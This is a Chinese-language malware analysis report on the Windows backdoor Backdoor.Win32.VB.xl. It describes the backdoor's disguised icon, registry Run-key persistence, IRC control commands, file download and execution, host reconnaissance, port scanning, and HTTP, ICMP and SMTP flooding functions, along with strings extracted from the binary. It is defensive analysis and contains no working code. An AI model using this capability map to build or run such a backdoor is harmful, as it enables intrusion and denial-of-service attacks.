病毒名称:Ba ckdoor.Win32.VB.xl(ipxsrv.exe) Backdoor.Win32.VB.xl(nwlink.exe)
病毒类型: WINDOWS下的木马程序
危害等级:高
文件长度: nwlink.exe 160,256 字节 Ipxsrv.exe 160,256 字节
感染系统: WINDOWS NT以上 版本
编写语言: Visual Basic 5.0/6.0
病毒描述:
病毒图标和本地连接的图标类似,借以欺骗用户。 ipxsrv.exe 及 nwlink.exe 不开放端口,从功能上分析类似 IRCBOT 后门控制手法 ,需要满足某种条件后才可被激活,感染后 在 %Windir% System32 中生成 nwlink.exe( 160,256 字节 ) 和 Ipxsrv.exe( 160,256 字节 ) 两个文件。开启 NWLink IPX Compatible Transport Protocol 服务。可进行拒绝服务攻击,在进程中增加 nwlink.exe 和 Ipxsrv.exe ,利用客户端可实现,扫描功能,上传文件,下载文件功能,服务端版本升级,获得服务端操作系统版本及语言,处理器型号信息, url 信息,以及 HTTP , SMTP , SCAN 的相关操作,修改注册表文件。 HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRunServices
行为分析:
1、 IRCX 功能
命令 S- ping/pong/IRCX/JOIN/MODE/Creat/join/i/privmsg/kick/nick/app/-close-multi/name
部分命令解释:
IRCX 命令来获知服务器是否支持 IRCX, 一些带有扩展功能的 IRCX 命令会包含一些额外的参数特别是 /mode 命令带有附加模式,只有 IRCX 服务器才能支持 也可查询服务器与 IRCX 的兼容性
/Create /create 创建一个新的闲聊室,并设置其属性
/Join /Join [] 创建或加入闲聊室
/Kick /Kick [] 用于闲聊室的主持人将用户由特定的闲聊室驱逐出去
/MOTD /MOTD 在“状态”窗口显示今天服务器中的消息
/Nick /Nick 更改别名
/Privmsg 与 /Msg 命令相同
/Privmsg {,} 如果你使用别名,则将消息作为耳语向一个或多个用户发送;
如果你指定闲聊室名,则作为常规消息向你所在闲聊室的所有聊客发送
i 设置非邀请莫入的闲聊室模式。 Sets invitation-only room mode.
2、 下载文件功能
执行下载时需要满足一些条件,如:执行形式在 0 到 6 之间选择,需要提供要执行的文件名
以 "." 表示结束
Failed to execute file [ ]. 文件执行失败提示:
File name is requirement. 报错提示
Try deleted file [ ] failed. 删除文件失败提示
Delete file [ ]has succeed. 删除文件成功提示
ERR: Source file name and destination file name are requirement. 文件重命名失败提示
Rename [ ] => [ ] has succeed. 文件重命名成功提示
Failed: Source file [ ] is not exist. 失败 : 源文件 [ ] 不存在提示 .
Try remove files( ) has completed. 清除文件成功提示
其他信息: Execute style mode is requirement
Execute file name is requirement
Execute style mode must between 0 to 6
3、搜集计算机相关信息及部分命令
-comtupername 计算机名
-cpu cpu 信息
-localtime -t 服务端的时间
-localip -ip 服务端的 ip 地址
-memory -mem 内存信息
-sysdir system folders 系统文件
-sysver system version 系统版本
-username -u 服务端的用户名
-windir windows 文件
-irc irc 服务
-pop pop3 服务
-port 端口号
-proc 进程
-install . 安装后具有 service 功能
halt 挂起
download 下在文件
-localtime 服务端的本地时间
-localip 服务端的本地 ip
-memory 获得内存大小
-user 获得用户
-windir 列出 win 目录
-tcpd 可用来进行 DNS 反向解析
-kill killedid
-list 进程列表
-reg 注册表功能
-start 开启服务
-task -task-list task 编号
admissive( 允许的 ) -boot -check
-m 列出 winnt 或 windows 下的文件
4、 传送功能 : (目前判断此功能用来进行 HTTP FLOOD )
POST /
Content-Type: application/x-www-form-urlencoded
Content-Length:
Cache-Control: no-cache
5、 终止进程命令
Killed: [ ] processess killed. 结束
- list 列出进程表
Failed: [ ] isn't in processes list. 进程不存在
Failed: PID isn't in processes list. PID 不再进程列表中
6、判断服务端所用语言功能,内置语言种类如下 :
Process Default Language
"Afrikaans"
"Albanian"
"Arabic (Saudi Arabia)"
"Arabic (Iraq)"
"Arabic (Egypt)"
"Arabic (Libya)"
"Arabic (Algeria)"
"Arabic (Morocco)"
"Arabic (Tunisia)"
"Arabic (Oman)"
"Arabic (Yemen)"
"Arabic (Syria)"
"Arabic (Jordan)"
"Arabic (Lebanon)"
"Arabic (Kuwait)"
"Arabic (U.A.E.)"
"Arabic (Bahrain)"
"Arabic (Qatar)"
"Windows 2000: Armenian. This is Unicode only."
"Windows 2000: Assamese. This is Unicode only."
"Azeri (Latin)"
"Azeri (Cyrillic)"
"Basque"
"Belarussian"
"Windows 2000: Bengali. This is Unicode only."
"Bulgarian"
"Burmese"
"Catalan"
"Chinese (Taiwan Region)"
"Chinese (PRC)"
"Chinese (Hong Kong SAR, PRC)"
"Chinese (Singapore)"
"Chinese (Macau)"
"Croatian"
"Czech"
"Danish"
"Dutch (Netherlands)"
"Dutch (Belgium)"
"English (United States)"
"English (United Kingdom)"
"English (Australian)"
"English (Canadian)"
"English (New Zealand)"
"English (Ireland)"
"English (South Africa)"
"English (Jamaica)"
"English (Caribbean)"
"English (Belize)"
"English (Trinidad)"
"English (Zimbabwe)"
"English (Philippines)"
"Estonian"
"Faeroese"
"Farsi"
"Finnish"
"French (Standard)"
"French (Belgian)"
"French (Canadian)"
"French (Switzerland)"
"French (Luxembourg)"
"French (Monaco)"
"Windows 2000: Georgian. This is Unicode only."
"German (Standard)"
"German (Switzerland)"
"German (Austria)"
"German (Luxembourg)"
"German (Liechtenstein)"
"Greek"
"Windows 2000: Gujarati. This is Unicode only."
"Hebrew"
"Windows 2000: Hindi. This is Unicode only."
"Hungarian"
"Icelandic"
"Indonesian"
"Italian (Standard)"
"Italian (Switzerland)"
"Japanese"
"Windows 2000: Kannada. This is Unicode only."
"Kashmiri (India)"
"Kazakh"
"Windows 2000: Konkani. This is Unicode only."
"Korean"
"Korean (Johab)"
"Latvian"
"Lithuanian"
"Lithuanian (Classic)"
"Macedonian"
"Malay (Malaysian)"
"Malay (Brunei Darussalam)"
"Windows 2000: Malayalam. This is Unicode only."
"Manipuri"
"Windows 2000: Marathi. This is Unicode only."
"Windows 2000: Nepali (India). This is Unicode only."
"Norwegian (Bokmal)"
"Norwegian (Nynorsk)"
"Windows 2000: Oriya. This is Unicode only."
"Polish"
"Portuguese (Brazil)"
"Portuguese (Standard)"
"Windows 2000: Punjabi. This is Unicode only."
"Romanian"
"Russian"
"Windows 2000: Sanskrit. This is Unicode only."
"Serbian (Cyrillic)"
"Serbian (Latin)"
"Sindhi"
"Slovak"
"Slovenian"
"Spanish (Traditional Sort)"
"Spanish (Mexican)"
"Spanish (Modern Sort)"
"Spanish (Guatemala)"
"Spanish (Costa Rica)"
"Spanish (Panama)"
"Spanish (Dominican Republic)"
"Spanish (Venezuela)"
"Spanish (Colombia)"
"Spanish (Peru)"
"Spanish (Argentina)"
"Spanish (Ecuador)"
"Spanish (Chile)"
"Spanish (Uruguay)"
"Spanish (Paraguay)"
"Spanish (Bolivia)"
"Spanish (El Salvador)"
"Spanish (Honduras)"
"Spanish (Nicaragua)"
"Spanish (Puerto Rico)"
"Sutu"
"Swahili (Kenya)"
"Swedish"
"Swedish (Finland)"
"Windows 2000: Tamil. This is Unicode only."
"Tatar (Tatarstan)"
"Windows 2000: Telugu. This is Unicode only."
"Thai"
"Turkish"
"Ukrainian"
"Urdu (Pakistan)"
"Urdu (India)"
"Uzbek (Latin)"
"Uzbek (Cyrillic)"
"Vietnamese"
"Unknown New Language"
7、 升级服务端
-updata 通过 80 端口
-r fail to run[ ].
exec 进程信息描述 PID
-l local:
-d
-e
-o
提示信息:
ERR: Unknown downloading status, client will close
Downloading... OVERWRITE
Downloading... bytes/remote:
Downloading... bytes/sec
Download completed.
Failed: Response file length is different than content length.
ERR: Socket error( )
Failed: Download client didn't ready.
Failed: No parameters found.
ERR: Protocal name doesn't found.
ERR: Environ [ ] doesn't exist.
ERR: Illegal local file name. [ ].
ERR: has been exist.
ERR: Socket did not ready.
8、 获得服务端操作系统的版本信息,内置版本信息入下
Windows 32s
Windows NT
Windows 95
Windows9x
Windows NT 4
WindowsNT
Windows NT 5.0
Windows2000
Windows NT 5.1
WindowsXP
Windows NT 5.2
Windows2003
9、 获得服务端处理器型号,内置型号信息如下 :
"Intel 386 Processor"
"Intel 486 Processor"
"Intel Pentium Processor"
"MIPS R4000 Processor"
"DEC Alpha 21064 Processor"
10、获得服务端浏览器版本号,内置浏览器版本如下 :
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 5.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 5.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 5.5; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 5.01; Win"...
"Mozilla/4.0 (compatible; MSIE 6.0b; Win"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 5.5; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0b; Win"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
11、 SCAN 功能: Scan port, start ipaddr, end ipaddr, all are requirement
连接扫描 connected.
Scan [ ] to [ ] has completed.
ip#s will scan( clients ).
错误扫描 ERR: illegal port number [ ].
ERR: illegal start ipaddr [ ].
ERR: illegal end paddr [ ]
ERR: You must make lesser IP address forward.
停止扫描 Stop scan [ ].
No active scaning
12、用户代理功能 :
User-Agent:
Host:
Connection: Keep-Alive
13、 帮助功能
Index 索引
Number 帮助选项
Description 功能描述
Scode 服务器代码
Source 来源
HelpFile 帮助文件
HelpContext 关联帮助
CancelDisplay 取消显示
14 、 ICMP FLOOD
调用 IcmpSendEcho ,通过打开的句柄发送 ICMP 请求,在超时或接收到应答报文后返回
包含如下信息: Stop sending to 停止发送数据
Start sending to 开始发送数据
No active ICMP working 无活动的 ICMP
Stop tcp to(clients) / start tcp to(clients)
No active tcp in working.
Stop flood port on (clients) and start flood port on (clients)
No active flood port working.
Stop full port on
start full port on
No active full port working.
15 、 使用 SMTP 服务功能发送新建:可重置,可获得 smtp 邮件服务器的域名,
使用 hello 命令 参数
服务器应答: 220 服务已准备好
250 所请求的邮件操作已进行完毕
354 开始邮件输入,以单行“ . ”号结束。
Helo 命令存在安全问题,如 helo hostname 从客户端打开问候信息,使用 SMTP 服务器识别客户机的身份,但客户机可随意修改这个 hostname
包含如下信息: smtp 服务关闭
smtp 服务数据到达
smtp 服务错误
16 、开启 / 停止 对 SMTP 服务器发启 DDOS 攻击
包含如下信息: Start / Stop smtp sending to
Start / Stop smtp sending to
Start / Stop ending to
Error start sending to [ ] is an illegal port.
No active UDP working.
No active smtp send working.
Can't resolve name.
Failed: Target port is requirement.
Failed: Target host/ipaddr is requirement.
Failed: Illegal web host name []
Failed: Illegal smtp host/ip []
Failed: Illegal smtp domain name.
Failed: Can't resolve ip address by name [
Failed: Can't resolve smtp host [
Failed: Smtp mail domain is requirement.
Failed: Smtp host/ip is requirement.
GET / 命令 相关参数 /c/s/n/u/h ( 此参数同样怀疑被用来进行 HTTP FLOOD)
端口 80
单位 KBytes/sec KB/Sec
:// ERR: Protocal name doesn't found.
http Failed: [ ] protocol does not support.
http:// Can't resolve name.
/n/r/p 客户端具有刷新和停止刷新功能
ERR: Unknown http type [ ].
ERR: URL is requirement.
17 、发送邮件功能
MAIL FROM: < 邮件来自于某处
RCPT TO: < smtp 命令,用来标识接收方 , 可能包含客户端用户的 email 地址
DATA 发送的数据
总结:这是一个功能比较强大的后门,但是限于目前的测试条件,暂时无法确定是如何激活后门自身,所以对以上的分析基本都是基于静态分析结果。
目前我们认为该后门可能存在这几种激活方式:
18、是后门在特定时间,主动连接 IRC 服务器,执行 IRC 脚本。
19、 后门在特定条件下发送 IP 通知邮件,等待服务端主动连接。
后门需要一个客户端来进行控制,发送特定的验证字符串,使得后门激活。